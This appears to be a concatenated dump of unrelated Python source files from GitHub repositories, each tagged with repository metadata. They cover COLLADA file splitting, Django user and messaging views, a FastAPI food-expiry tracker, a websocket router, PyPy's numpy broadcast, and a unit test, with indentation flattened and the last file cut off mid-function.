print('node_tags: ', len(node_tags))
# 遍历所有的node
count = 0
for node in node_tags:
# 新建一个dae文档对象
new_doc = impl.createDocument(None, 'COLLADA', None)
# 获取新建dae文档对象的根节点COLLADA节点
new_doc_root = new_doc.documentElement
new_doc_root.setAttribute('xmlns', 'http://www.collada.org/2005/11/COLLADASchema')
new_doc_root.setAttribute('version', '1.4.1')
# 将asset节点添加到新建的dae文档对象中
new_doc_root.appendChild(asset_tag)
# 将当前node节点添加到新建的dae文档对象中
library_visual_scenes = new_doc.createElement('library_visual_scenes')
visual_scene = new_doc.createElement('visual_scene')
visual_scene.setAttribute('id', 'IfcOpenShell')
visual_scene.appendChild(node)
library_visual_scenes.appendChild(visual_scene)
new_doc_root.appendChild(library_visual_scenes)
# 获取当前node对应的geometry的id
instance_geometry = node.getElementsByTagName('instance_geometry')[0]
geometry_id = instance_geometry.getAttribute('url')[1:]
geometrys = getElementsById(geometry_tags, geometry_id)
# 将当前geometry节点添加到新建的dae文档对象中
library_geometries = new_doc.createElement('library_geometries')
for geometry in geometrys:
library_geometries.appendChild(geometry)
new_doc_root.appendChild(library_geometries)
# 将material节点和effect节点的父节点
library_materials = new_doc.createElement('library_materials')
library_effects = new_doc.createElement('library_effects')
instance_materials = node.getElementsByTagName('instance_material')
for instance_material in instance_materials:
material_id = instance_material.getAttribute('target')[1:]
materials = getElementsById(material_tags, material_id)
for material in materials:
library_materials.appendChild(material)
instance_effect = material.getElementsByTagName('instance_effect')[0]
effect_id = instance_effect.getAttribute('url')[1:]
effects = getElementsById(effect_tags, effect_id)
for effect in effects:
library_effects.appendChild(effect)
# 将material节点和effect节点添加到新建的dae文档对象中
new_doc_root.appendChild(library_materials)
new_doc_root.appendChild(library_effects)
# 将scene节点添加到新建的dae文档对象中
new_doc_root.appendChild(scene_tag)
# encoding='utf-8'很重要,解决了编码问题
output_file = output_dir + '\\' + dae_path[dae_path.rfind('\\') + 1: dae_path.find('.')] + '-' + geometry_id + '-' + str(count) + '.dae'
with open(output_file, mode='w', encoding='utf-8') as f:
print('start writing...')
print(count)
new_doc.writexml(f, addindent='', newl='', encoding='utf-8')
print('done writing...')
print('#'*100)
count += 1
print('current count', count)
print('-'*20)
def getElementsById(doms, id):
'''
根据id从查找相关dom
'''
result = list()
for dom in doms:
dom_id = dom.getAttribute('id')
if dom_id == id:
result.append(dom)
return result
if __name__ == '__main__':
dae_path = 'C:\\Users\\dell\\Desktop\\Lab.dae'
base_output_dae_path = 'C:\\Users\\dell\\Desktop'
# 1iUTeNLx945xp4Fd_hV3Bb存在两次
# dae_path = input('请输入dae文件路径: ')
# base_output_dae_path = input('请输入生成文件所在的路径: ')
process(dae_path, base_output_dae_path) | XinJack/UsefulScripts | daeProcessor_python/daeProcessor.py | daeProcessor.py | py | 4,418 | python | en | code | 0 | github-code | 36 |
26446464278 | from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from .forms import SignUpForm, ProfileForm, LoginForm
from django.shortcuts import render, redirect
from .models import Profile, Search
from product.models import Product
import json
def signup_view(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
# We use the new user credentials to log him in
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password1')
user = authenticate(username=username, password=password)
login(request, user)
# We make a new profile when a new user is created
profile = Profile()
profile.user = request.user
profile.save()
return redirect('home')
else:
form = SignUpForm()
return render(request, 'user/signup.html', {'form': form})
def login_view(request):
if request.method == 'POST':
form = LoginForm(request, data=request.POST)
if form.is_valid():
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password')
user = authenticate(username=username, password=password)
login(request, user)
return redirect('home')
else:
form = LoginForm()
return render(request, 'user/login.html', {'form': form})
@login_required
def profile(request):
try:
profile = Profile.objects.get(user=request.user)
except Profile.DoesNotExist:
# We make a new profile if it doesn't exist for the current user
profile = Profile(user=request.user).save()
if request.method == 'POST':
form = ProfileForm(request.POST, request.FILES, instance=profile)
if form.is_valid():
form_profile = form.save(commit=False)
# We set the profile info
request.user.username = request.POST['username']
request.user.first_name = request.POST['first_name']
request.user.last_name = request.POST['last_name']
request.user.email = request.POST['email']
request.user.save()
form_profile.user = request.user
# If the user sets a profile picture
if 'image' in request.FILES:
image = request.FILES['image']
if image:
form_profile.image = image
form_profile.save()
return redirect('profile')
# When the user opens the profile page all the fields are already filled out
form = ProfileForm()
form.fields['image'].label = 'Mynd'
form.fields['username'].initial = request.user.username
form.fields['first_name'].initial = request.user.first_name
form.fields['last_name'].initial = request.user.last_name
form.fields['email'].initial = request.user.email
return render(request, 'user/profile.html', {
'form': form,
'image': profile.image.url
})
def __get_product_list(user_id):
# Get a list of all the ids for the products the current user has viewed
search = Search.objects.filter(profile__user_id=user_id).order_by('-date_of_search').values_list('product_id',
flat=True)
product_list = []
# Get each product by id and add to the products_list
for i in search:
curr_product = Product.objects.get(id=i)
product_list.append(curr_product)
return product_list
@login_required
def viewed_products(request):
return render(request, 'user/viewed_products.html', {
# Limit the list to the last 10 products viewed
'products': __get_product_list(request.user.id)[:10]
})
# Utilized for viewed products, each view for a user gets appended to the list
search_list = []
def add_to_search(request):
if request.method == 'POST':
if request.user.is_authenticated:
try:
user_profile = Profile.objects.get(user__id=request.user.id)
# The user has no profile so we create one
except Profile.DoesNotExist:
user_profile = Profile()
user_profile.user = request.user
user_profile.save()
# We make a new search instance and use the profile of the user
search = Search()
search.profile = user_profile
# Get the id for the viewed product
try:
product_id = json.loads(request.body)
except json.JSONDecodeError:
return send_json('JSON was invalid', 400)
# If the user has viewed the product, then we don't add it again to the search_list
if (user_profile.id, product_id) in search_list:
return send_json('The search already exists', 409)
elif Search.objects.filter(profile__id=user_profile.id, product__id=product_id).exists():
search_list.remove((user_profile.id, product_id))
return send_json('The search already exists', 409)
else:
search_list.append((user_profile.id, product_id))
try:
product = Product.objects.get(id=product_id)
except Product.DoesNotExist:
return send_json('The viewed product was not found', 404)
search.product = product
search.save()
return send_json('', 201, product_id)
else:
return JsonResponse({'data': request.GET})
else:
return send_json('Request method not supported', 400)
def send_json(message, status_code, data={}):
response = JsonResponse({
'data': data,
'message': message
})
response.status_code = status_code
return response
| RunarVestmann/verklegtnamskeid2 | captain_console/user/views.py | views.py | py | 6,004 | python | en | code | 0 | github-code | 36 |
7752973710 | from fastapi import FastAPI, Request, Form, HTTPException
from fastapi.templating import Jinja2Templates
from fastapi.responses import HTMLResponse, RedirectResponse, JSONResponse
from pydantic import BaseModel
import psycopg2
import datetime
from uuid import uuid4
from fastapi.responses import StreamingResponse
from io import BytesIO
from typing import Optional
import tempfile
import os
from PIL import Image
import os
from .routers import background_tasks, create_qr_codes
from dotenv import load_dotenv
from os import getenv
load_dotenv() # take environment variables from .env.
app = FastAPI()
app.include_router(background_tasks.router)
app.include_router(create_qr_codes.router)
templates_path = os.path.join(os.path.dirname(__file__), "templates")
templates = Jinja2Templates(directory=templates_path)
# Connect to the database
def connect_to_db():
use_ssl = 'localhost' not in os.getenv("DATABASE_URL")
conn = psycopg2.connect(os.getenv("DATABASE_URL"), sslmode='require' if use_ssl else None)
return conn
# Initialize the database
def init_db():
conn = connect_to_db()
cursor = conn.cursor()
cursor.execute("""
CREATE TABLE IF NOT EXISTS food_items (
pk UUID PRIMARY KEY,
id UUID NOT NULL,
food VARCHAR(255) NOT NULL,
date_added DATE NOT NULL,
expiration_date DATE NOT NULL,
notes VARCHAR(255),
update_time TIMESTAMP NOT NULL,
date_consumed DATE,
location VARCHAR(255)
)
""")
conn.commit()
cursor.close()
conn.close()
init_db()
TWILIO_ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
TWILIO_AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
TWILIO_PHONE_NUMBER = os.environ['TWILIO_PHONE_NUMBER']
# Define the request model
class FoodItem(BaseModel):
pk: Optional[str] = None
id: Optional[str] = None
food: str
date_added: datetime.date
expiration_date: datetime.date
notes: Optional[str] = None
days_old: Optional[int] = None
days_left: Optional[int] = None
update_time: Optional[datetime.datetime] = None
date_consumed: Optional[datetime.date] = None
location: Optional[str] = None
async def get_food_items(query_string):
conn = connect_to_db()
cur = conn.cursor()
query = """
SELECT fi.pk, fi.id, fi.food, fi.date_added, fi.expiration_date, fi.notes, fi.update_time, fi.date_consumed, fi.location
FROM food_items fi
INNER JOIN (
SELECT id, MAX(update_time) AS max_update_time
FROM food_items
GROUP BY id
) AS mfi ON fi.id = mfi.id AND fi.update_time = mfi.max_update_time
WHERE fi.date_consumed IS NULL
"""
query = query + query_string
cur.execute(query)
rows = cur.fetchall()
cur.close()
conn.close()
food_items = [FoodItem(pk=row[0], days_left=(row[4] - datetime.date.today()).days, id=row[1], food=row[2], date_added=row[3], expiration_date=row[4], notes=row[5], update_time=row[6], date_consumed=row[7], location=row[8]) for row in rows]
return food_items
@app.get("/", response_class=HTMLResponse)
async def read_items(request: Request, sort_by_expiration_date: bool = False, sort_order: Optional[str] = None):
query_string = ""
if sort_by_expiration_date:
order = "ASC" if sort_order == "asc" else "DESC"
query_string = f" ORDER BY fi.expiration_date {order}"
query_string += ";"
food_items = await get_food_items(query_string)
return templates.TemplateResponse("index.html", {"request": request, "food_items": food_items})
@app.get("/favicon.ico")
def read_favicon():
raise HTTPException(status_code=204, detail="No content")
@app.get("/{item_id}/update/", response_class=HTMLResponse)
async def edit_food_item(
request: Request,
item_id: str):
food_item = {}
location_list=[]
query_string = ";"
food_items = await get_food_items(query_string)
for item in food_items:
if item.location not in location_list:
location_list.append(item.location)
if item.id == item_id:
food_item = {
"id": item.id,
"food": item.food,
"date_added": item.date_added,
"expiration_date": item.expiration_date,
"notes": item.notes,
"date_consumed": item.date_consumed,
"location": item.location
}
return templates.TemplateResponse("edit.html", {"locations": location_list, "request": request, "item": food_item})
@app.post("/{item_id}/update/")
async def update_food_item(
item_id: str,
food: str = Form(...),
expiration_date: datetime.date = Form(...),
notes: Optional[str] = Form(None),
date_consumed: Optional[datetime.date] = Form(None),
location: Optional[str] = Form(None)):
conn = connect_to_db()
cursor = conn.cursor()
# create new entry for edit so needs a new PK
item_pk = str(uuid4())
# capture time of edit
dt = datetime.datetime.now()
# get date_added from original entry and add to updated entry
cursor.execute("SELECT date_added FROM food_items WHERE id=%s", (item_id,))
date_added_row = cursor.fetchone()
date_added = date_added_row[0] if date_added_row is not None else datetime.date.today()
cursor.execute(
"INSERT INTO food_items (pk, id, food, date_added, expiration_date, notes, update_time, date_consumed, location) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",
(item_pk, item_id, food, date_added, expiration_date, notes, dt, date_consumed, location),
)
conn.commit()
cursor.close()
conn.close()
return {"success": True, "message": "Successfully updated the food item."}
@app.get("/{item_id}/view/", response_class=HTMLResponse)
async def view_food_item(request: Request, item_id: str):
conn = connect_to_db()
cursor = conn.cursor()
cursor.execute("SELECT * FROM food_items WHERE id = %s ORDER BY update_time DESC LIMIT 1", (item_id,))
item = cursor.fetchone()
cursor.close()
conn.close()
if not item:
raise HTTPException(status_code=404, detail="Food item not found")
days_old = (datetime.date.today() - item[3]).days
days_left = (item[4] - datetime.date.today()).days
food_item = FoodItem(id=item[1], food=item[2], date_added=item[3], days_old=days_old, days_left=days_left ,expiration_date=item[4], notes=item[5], date_consumed=item[6], location=item[7])
return templates.TemplateResponse("view.html", {"request": request, "item": food_item})
@app.get("/consumed_items/", response_class=HTMLResponse)
async def read_updated_items(request: Request, sort_by_expiration_date: bool = False):
conn = connect_to_db()
cur = conn.cursor()
query = """
SELECT fi.pk, fi.id, fi.food, fi.date_added, fi.expiration_date, fi.notes, fi.update_time, fi.date_consumed, fi.location
FROM food_items fi
INNER JOIN (
SELECT id, MAX(update_time) AS max_update_time
FROM food_items
GROUP BY id
) AS mfi ON fi.id = mfi.id AND fi.update_time = mfi.max_update_time
WHERE fi.date_consumed IS NOT NULL;
"""
if sort_by_expiration_date:
query += " ORDER BY fi.expiration_date"
cur.execute(query)
rows = cur.fetchall()
cur.close()
conn.close()
food_items = [FoodItem(pk=row[0], id=row[1], food=row[2], date_added=row[3], expiration_date=row[4], notes=row[5], update_time=row[6], date_consumed=row[7], location=row[8]) for row in rows]
return templates.TemplateResponse("consumed.html", {"request": request, "food_items": food_items})
@app.get("/{item_id}/")
async def handle_qr_scan(item_id: str):
conn = connect_to_db()
cursor = conn.cursor()
cursor.execute("""
SELECT * FROM food_items
WHERE id = %s
ORDER BY update_time DESC
LIMIT 1
""", (item_id,))
item = cursor.fetchone()
cursor.close()
conn.close()
if item and item[7] is None:
return RedirectResponse(url=f"/{item_id}/view/")
else:
# Add the new UUID to the database before redirecting to the update page
return RedirectResponse(url=f"/{item_id}/update/")
@app.get("/{item_id}/consumed/")
async def add_consumed_date(item_id: str):
conn = connect_to_db()
cursor = conn.cursor()
# Find the latest entry based on the "update_time" column for the passed in item.id
cursor.execute("""
SELECT * FROM food_items
WHERE id = %s
ORDER BY update_time DESC
LIMIT 1
""", (item_id,))
item = cursor.fetchone()
# create new entry for edit so needs a new PK
item_pk = str(uuid4())
if not item:
raise HTTPException(status_code=404, detail="Item not found")
# Create a new entry with the same info, but add the current time to the "update_time" column and "date_consumed" column
current_time = datetime.datetime.now()
cursor.execute(
"INSERT INTO food_items (pk, id, food, date_added, expiration_date, notes, update_time, date_consumed, location) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)",
(item_pk, item_id, item[2], item[3], item[4], item[5], current_time, current_time, item[7]),
)
conn.commit()
cursor.close()
conn.close()
return RedirectResponse(url="/")
| ksindy/qrfood | qr_food_app/main.py | main.py | py | 9,400 | python | en | code | 0 | github-code | 36 |
26415954202 | # This file runs the websockets.
import string, cgi, time
import sys
sys.path.insert(0, 'PyWebPlug')
from wsserver import *
from time import sleep
def setupMessages():
return
class Client:
def __init__(self, socket):
self.socket = socket
self.needsConfirmation = True
def handle(self):
if (self.socket):
try:
data = self.socket.readRaw()
except:
self.socket = None
if len(data) == 0:
return
print("Data:", data)
if self.needsConfirmation:
code = data[3:7]
if code == "0000":
print("Becoming a host!")
self.becomeHost()
else:
print("Trying to find host", code)
self.host = findHost(code)
if self.host:
print("Found host.")
self.confirm()
else:
print("No host found.")
else:
if self.host.socket:
try:
self.host.socket.send(data)
except:
self.host.socket = None
print("Host's socket is closed.")
# This is called to confirm to the client that they have been accepted,
# after they send us their details.
def confirm(self):
self.pID = self.host.getNextpID()
self.host.players[self.pID] = self
self.needsConfirmation = False
self.sID = extend(self.pID, 2)
self.socket.send("999" + self.sID)
self.host.socket.send("998" + self.sID)
def becomeHost(self):
host = Host(self.socket, newHostCode())
clients.remove(self)
hosts.append(host)
def disconnect(self):
print("Lost client...")
clients.remove(self)
self.socket = None
return
class Host:
def __init__(self, socket, hostCode):
self.socket = socket
self.hostCode = hostCode
self.players = {}
self.pID = 0
self.socket.send("999" + str(self.hostCode))
self.writingTo = 0
self.data = ""
def getNextpID(self):
self.pID += 1
return self.pID
def handle(self):
if (self.socket):
try:
self.data += self.socket.readRaw()
except:
self.socket = None
if len(self.data) == 0:
return
print("Host says: "+self.data)
ind = self.data.find("*")
if (ind < 0):
return
if self.writingTo == 0:
try:
self.writingTo = int(self.data[0:2])
except:
self.data = self.data[1:]
self.handle()
return;
pID = self.writingTo
if self.players[pID]:
if self.players[pID].socket:
try:
self.players[pID].socket.send(self.data[2:ind])
except:
self.players[pID].socket = None;
print("Client's socket closed.")
else:
print("Host", self.hostCode," tried to send a messaged to non-existant player", pID)
self.data = self.data[ind+2:]
self.writingTo = 0
def disconnect(self):
print("Lost host.")
hosts.remove(self)
self.socket = None
return
def findHost(code):
for host in hosts:
if host.hostCode == code:
return host
return None
def newHostCode():
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
code = ''.join(chars[int(random.random()*26)] for _ in range(4))
if findHost(code):
return newHostCode()
return code
def extend(v, l):
out = str(v)
while len(out) < l:
out = "0" + out
return out
# This handles a new client.
# We need to hand them to an object
# so that we can read and write from it
def handle(socket):
global clients
client = Client(socket)
clients.append(client)
def main():
global gameStarted
global stage
try:
setupMessages()
server = startServer()
while True:
newClient = handleNetwork()
if newClient:
handle(newClient)
for client in clients:
client.handle()
for host in hosts:
host.handle()
sleep(0.01)
except KeyboardInterrupt:
print(' received, closing server.')
server.close()
clients = []
hosts = []
pID = 0
if __name__ == '__main__':
main()
| ChrisFadden/PartyTowers | webrouter.py | webrouter.py | py | 4,597 | python | en | code | 1 | github-code | 36 |
43298706244 | import pypy.module.micronumpy.constants as NPY
from nditer import ConcreteIter, parse_op_flag, parse_op_arg
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.gateway import interp2app
from pypy.interpreter.typedef import TypeDef, GetSetProperty
from pypy.module.micronumpy import support
from pypy.module.micronumpy.base import W_NDimArray, convert_to_array, W_NumpyObject
from rpython.rlib import jit
from strides import calculate_broadcast_strides, shape_agreement_multiple
def descr_new_broadcast(space, w_subtype, __args__):
return W_Broadcast(space, __args__.arguments_w)
class W_Broadcast(W_NumpyObject):
"""
Implementation of numpy.broadcast.
This class is a simplified version of nditer.W_NDIter with fixed iteration for broadcasted arrays.
"""
def __init__(self, space, args):
num_args = len(args)
if not (2 <= num_args <= NPY.MAXARGS):
raise oefmt(space.w_ValueError,
"Need at least two and fewer than (%d) array objects.", NPY.MAXARGS)
self.seq = [convert_to_array(space, w_elem)
for w_elem in args]
self.op_flags = parse_op_arg(space, 'op_flags', space.w_None,
len(self.seq), parse_op_flag)
self.shape = shape_agreement_multiple(space, self.seq, shape=None)
self.order = NPY.CORDER
self.iters = []
self.index = 0
try:
self.size = support.product_check(self.shape)
except OverflowError as e:
raise oefmt(space.w_ValueError, "broadcast dimensions too large.")
for i in range(len(self.seq)):
it = self.get_iter(space, i)
it.contiguous = False
self.iters.append((it, it.reset()))
self.done = False
pass
def get_iter(self, space, i):
arr = self.seq[i]
imp = arr.implementation
if arr.is_scalar():
return ConcreteIter(imp, 1, [], [], [], self.op_flags[i], self)
shape = self.shape
backward = imp.order != self.order
r = calculate_broadcast_strides(imp.strides, imp.backstrides, imp.shape,
shape, backward)
iter_shape = shape
if len(shape) != len(r[0]):
# shape can be shorter when using an external loop, just return a view
iter_shape = imp.shape
return ConcreteIter(imp, imp.get_size(), iter_shape, r[0], r[1],
self.op_flags[i], self)
def descr_iter(self, space):
return self
def descr_get_shape(self, space):
return space.newtuple([space.newint(i) for i in self.shape])
def descr_get_size(self, space):
return space.newint(self.size)
def descr_get_index(self, space):
return space.newint(self.index)
def descr_get_numiter(self, space):
return space.newint(len(self.iters))
@jit.unroll_safe
def descr_next(self, space):
if self.index >= self.size:
self.done = True
raise OperationError(space.w_StopIteration, space.w_None)
self.index += 1
res = []
for i, (it, st) in enumerate(self.iters):
res.append(self._get_item(it, st))
self.iters[i] = (it, it.next(st))
if len(res) < 2:
return res[0]
return space.newtuple(res)
def _get_item(self, it, st):
return W_NDimArray(it.getoperand(st))
W_Broadcast.typedef = TypeDef("numpy.broadcast",
__new__=interp2app(descr_new_broadcast),
__iter__=interp2app(W_Broadcast.descr_iter),
next=interp2app(W_Broadcast.descr_next),
shape=GetSetProperty(W_Broadcast.descr_get_shape),
size=GetSetProperty(W_Broadcast.descr_get_size),
index=GetSetProperty(W_Broadcast.descr_get_index),
numiter=GetSetProperty(W_Broadcast.descr_get_numiter),
)
| mozillazg/pypy | pypy/module/micronumpy/broadcast.py | broadcast.py | py | 4,124 | python | en | code | 430 | github-code | 36 |
34087887942 | # def takeRGBValues():
# print("Enter the values of channels:")
# channel1 = int(input(
# "Enter the value of 1st Channel: "))
# channel2 = int(input(
# "Enter the value of 2nd Channel: "))
# channel3 = int(input(
# "Enter the value of 3rd Channel: "))
# return channel1, channel2, channel3
def takeRGBValues():
print("Enter the values of channels:")
rgbChannels = []
for i in range(3):
channel_value = int(input(f"Enter the value of Channel {i+1}: "))
if channel_value < 0 or channel_value > 255:
raise ValueError("Channel values should be between 0 and 255")
rgbChannels.append(channel_value)
print(rgbChannels)
return bytes(rgbChannels)
# def takeLEDValue():
# print("Please enter the brightness you want: ")
# brightnessChannels = []
# for i in range(3):
# channel_value = int(input(f"Enter the value of Channel {i+1}: "))
# if channel_value < 0 or channel_value > 255:
# raise ValueError("Channel values should be between 0 and 255")
# brightnessChannels.append(channel_value)
# print(brightnessChannels)
# return bytes(brightnessChannels)
def takeLEDValue():
print("Please enter the brightness you want: ")
brightness = int(input("Enter the brightness value (0-255): "))
if brightness < 0 or brightness > 255:
raise ValueError("Brightness value should be between 0 and 255")
return bytes([brightness, 0, 0]) | arshactually/Multi_simulator2.0 | src/values_input.py | values_input.py | py | 1,527 | python | en | code | 0 | github-code | 36 |
18407340005 | import os
import tensorflow as tf
from smart_compose.utils import parsing_utils
from smart_compose.utils.parsing_utils import InputFtrType
from smart_compose.utils.testing.test_case import TestCase
class TestParsingUtils(TestCase):
"""Unit test for parsing_utils.py"""
atol = 1e-3
def testIterateItemsWithListVal(self):
"""Tests iterate_items_with_list_val"""
dct_lst = [{'a': 'a'},
{'a': ['a']}]
expected_result_lst = [[('a', ['a'])],
[('a', ['a'])]]
assert len(dct_lst) == len(expected_result_lst), 'Number of test data and result must match'
for dct, expected_result in zip(dct_lst, expected_result_lst):
self.assertCountEqual(expected_result, list(parsing_utils.iterate_items_with_list_val(dct)))
def testGetFeatureTypes(self):
"""Tests get_feature_types() """
self.assertCountEqual(
[InputFtrType.TARGET_COLUMN_NAME],
parsing_utils.get_feature_types())
def testHparamsLoadAndSave(self):
"""Tests loading and saving of hparams"""
hparams = parsing_utils.HParams(a=1, b=2, c=[1, 2, 3])
parsing_utils.save_hparams(self.resource_dir, hparams)
loaded_hparams = parsing_utils.load_hparams(self.resource_dir)
self.assertEqual(hparams, loaded_hparams)
os.remove(parsing_utils._get_hparam_path(self.resource_dir))
def testEstimateStepsPerEpoch(self):
"""Tests estimate_steps_per_epoch() """
num_record = parsing_utils.estimate_steps_per_epoch(self.data_dir, 1)
self.assertEqual(num_record, 40)
if __name__ == '__main__':
tf.test.main()
| linkedin/detext | test/smart_compose/utils/test_parsing_utils.py | test_parsing_utils.py | py | 1,685 | python | en | code | 1,249 | github-code | 36 |
74134918182 | from cmath import nan
import re
from types import NoneType
from django.shortcuts import render, redirect
from django.http import JsonResponse
from mensajeria.models import (
Archivos,
Destinatarios,
Personas,
Maestras,
Peticion,
Paises,
Areas,
Secciones,
Grupos
)
from mensajeria.forms import ArchivosForm
import os
from datetime import datetime
from django.conf import settings
import pandas as pd
import json
from django.http import HttpResponse
from openpyxl import Workbook
from rest_framework.generics import CreateAPIView, GenericAPIView
from ...mixins.base import ResponseMixin
from ...serializers.auth.signup_serializers import SignupSerializers
from ...serializers.auth.signin_serializers import SigninSerializers
from rest_framework.response import Response
from rest_framework import status
from django.shortcuts import render
from django.http import HttpResponse
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
class Preparation(CreateAPIView, ResponseMixin):
serializer_class = SignupSerializers
def get_validar_numero(self, numero):
regex = r"\d{10}$"
return re.match(regex, numero) is not None
def get_binary_search(self, arr, target):
left, right = 0, len(arr) - 1
while left <= right:
mid = (left + right) // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
left = mid + 1
else:
right = mid - 1
return -1
def get_data_null(self, txt):
if txt is nan:
return ""
else:
return txt
def get_validar_campos(self, matriz):
return [
[str(x) if x is not None and not pd.isna(x) else "" for x in row]
for row in matriz
]
def get_pais(self, paises_validos, paises_codigo, pais):
try:
if pais == "Colombia":
pais_id = 39
codigo = paises_codigo[38]
else:
index = self.get_binary_search(paises_validos, pais)
if index != -1:
pais_id = index + 1
codigo = paises_codigo[index]
else:
pais_id = 39
codigo = paises_codigo[38]
except ValueError:
pais_id = 39
codigo = paises_codigo[38]
return pais_id, codigo
def post(self, request, *args, **kwargs):
try:
if "archivo_excel_area" in request.FILES:
archivo = request.FILES["archivo_excel_area"]
if archivo.name.endswith((".xls", ".xlsx")):
df = pd.read_excel(archivo, engine="openpyxl")
matriz = df.values.tolist()
errados = []
validos = []
validos_celular = []
duplicados = []
duplicados_add = []
duplicados_docu = []
num_validos = 0
num_duplicados = 0
num_errados = 0
personas_actuales = Personas.objects.all().order_by("telefonowhatsapp")
paises_actuales = Paises.objects.all().order_by("nombre")
paises_validos = []
paises_codigo = []
validos_actuales = []
documentos_actuales = []
for pais_list in paises_actuales:
paises_validos.append(pais_list.nombre)
paises_codigo.append(pais_list.codigo)
for persona in personas_actuales:
validos_actuales.append(persona.telefonowhatsapp)
documentos_actuales.append(persona.identificacion)
matriz_data = self.get_validar_campos(matriz)
for row in matriz_data:
nombre = row[0].strip()
segundo_nombre = row[1].strip()
apellido = row[2].strip()
segundo_apellido = row[3].strip()
celular = row[4].strip()
pais = row[5].strip()
documento = row[6].strip()
tipoidentificacion = row[7].strip()
fechanacimiento = row[8].strip()
ocupacion = row[9].strip()
area = row[10].strip()
seccion = row[11].strip()
grupo = row[12].strip()
pais_id, codigo = self.get_pais(paises_validos, paises_codigo, pais)
try:
fechanacimiento = datetime.strptime(
fechanacimiento, "%Y-%m-%d %H:%M:%S"
).date()
if fechanacimiento > datetime.now().date():
fechanacimiento = ""
except ValueError:
fechanacimiento = ""
if not isinstance(celular, str):
celular = str(celular)
documento = str(documento).rstrip(".0")
persona_new = {
"nombre": nombre,
"segundo_nombre": segundo_nombre,
"apellido": apellido,
"segundo_apellido": segundo_apellido,
"celular_whatsapp": celular,
"whatsapp_prefijo": codigo + celular,
"pais": pais_id,
"documento": documento,
"tipoidentificacion": tipoidentificacion,
"fechanacimiento": fechanacimiento,
"ocupacion": ocupacion,
"area": area,
"seccion": seccion,
"grupo": grupo,
"message": "",
}
if not self.get_validar_numero(persona_new["celular_whatsapp"]):
persona_new["message"] = "Numero de whatsapp invalido."
errados.append(persona_new)
num_errados = num_errados + 1
elif not self.get_validar_numero(persona_new["documento"]):
persona_new["message"] = "Numero de documento invalido."
errados.append(persona_new)
num_errados = num_errados + 1
else:
validos_celular.sort()
index_validos = self.get_binary_search(validos_celular, celular)
if index_validos != -1:
persona_new[
"message"
] = "Numero de whatsapp duplicado en el excel."
duplicados.append(persona_new)
num_duplicados = num_duplicados + 1
else:
index2 = self.get_binary_search(validos_actuales, celular)
if index2 != -1:
persona_new[
"message"
] = "Numero de whatsapp duplicado en la base de datos."
duplicados.append(persona_new)
num_duplicados = num_duplicados + 1
else:
persona_new["message"] = "Datos correctos."
validos_celular.append(celular)
validos.append(persona_new)
num_validos = num_validos + 1
data = {
"validos": {"count": num_validos, "data": validos},
"errados": {"count": num_errados, "data": errados},
"duplicados": {"count": num_duplicados, "data": duplicados},
}
self.data = data
else:
self.error = "Archivo no encontrado"
self.status = status.HTTP_400_BAD_REQUEST
except Exception as e:
self.error = str(e)
self.status = status.HTTP_400_BAD_REQUEST
return Response(self.response_obj)
class Save(CreateAPIView, ResponseMixin):
serializer_class = SignupSerializers
def post_add_person(self, data, user):
nueva_persona = Personas(
nombre=data["nombre"],
segundonombre=data["segundo_nombre"],
apellido=data["apellido"],
segundoapellido=data["segundo_apellido"],
telefonomovil=data["celular_llamada"],
telefonowhatsapp=data["celular_whatsapp"],
identificacion=data["documento"],
fechanacimiento=data["fechanacimiento"],
pais_id=data["pais_id"],
created_by=user,
)
nueva_persona.save()
persona_id = nueva_persona.id
nuevo_registro = Destinatarios(
persona_id=persona_id, created_by=user, estado_id=596, grupo_id = data["grupo_id"]
)
nuevo_registro.save()
return True
def get_binary_search(self, arr, target):
left, right = 0, len(arr) - 1
while left <= right:
mid = (left + right) // 2
if arr[mid] == target:
return mid
elif arr[mid] < target:
left = mid + 1
else:
right = mid - 1
return -1
def get_search(self, lista, valor):
try:
index = lista.index(valor)
return index
except ValueError:
return -1
def post(self, request, *args, **kwargs):
try:
personas = request.data["destinatarios"]
user = request.user
validos = []
num_validos = 0
invalidos = []
num_invalidos = 0
areas_actuales = Areas.objects.filter(estado_id=596).order_by("nombre")
secciones_actuales = Secciones.objects.filter(estado_id=596).order_by("nombre")
grupos_actuales = Grupos.objects.filter(estado_id=596).order_by("nombre")
areas_listado = []
areas_listado_id = []
secciones_listado = []
secciones_listado_id = []
grupos_listado = []
grupos_listado_id = []
grupos_listado_info = []
for area_list in areas_actuales:
areas_listado_id.append(area_list.id)
areas_listado.append(area_list.nombre)
for seccion_list in secciones_actuales:
secciones_listado_id.append(seccion_list.id)
secciones_listado.append(seccion_list.nombre)
for grupos_list in grupos_actuales:
grupos_listado_id.append(grupos_list.id)
grupos_listado.append(grupos_list.nombre)
areas_array = []
secciones_array = []
grupos_array = []
for row in personas:
index_validos = self.get_search(areas_listado, row['area'])
if index_validos != -1:
area_id = areas_listado_id[index_validos]
else:
areas_listado.append(row["area"])
new_area = Areas()
new_area.nombre = row["area"]
new_area.descripcion = ""
new_area.estado_id = 596
new_area.created_by = user
new_area.save()
area_id = new_area.id
areas_listado_id.append(area_id)
index_seccion = self.get_search(secciones_listado, row['seccion'])
if index_seccion != -1:
seccion_id = secciones_listado_id[index_seccion]
else:
secciones_listado.append(row['seccion'])
new_seccion = Secciones()
new_seccion.nombre = row['seccion']
new_seccion.area_id = area_id
new_seccion.descripcion = ""
new_seccion.estado_id = 596
new_seccion.created_by = user
new_seccion.save()
seccion_id = new_seccion.id
secciones_listado_id.append(seccion_id)
index_grupo = self.get_search(grupos_listado, row['grupo'])
if index_grupo != -1:
grupo_id = grupos_listado_id[index_grupo]
else:
grupos_listado.append(row['grupo'])
new_grupo = Grupos()
new_grupo.nombre = row['grupo']
new_grupo.seccion_id = seccion_id
new_grupo.descripcion = ""
new_grupo.estado_id = 596
new_grupo.created_by = user
new_grupo.save()
grupo_id = new_grupo.id
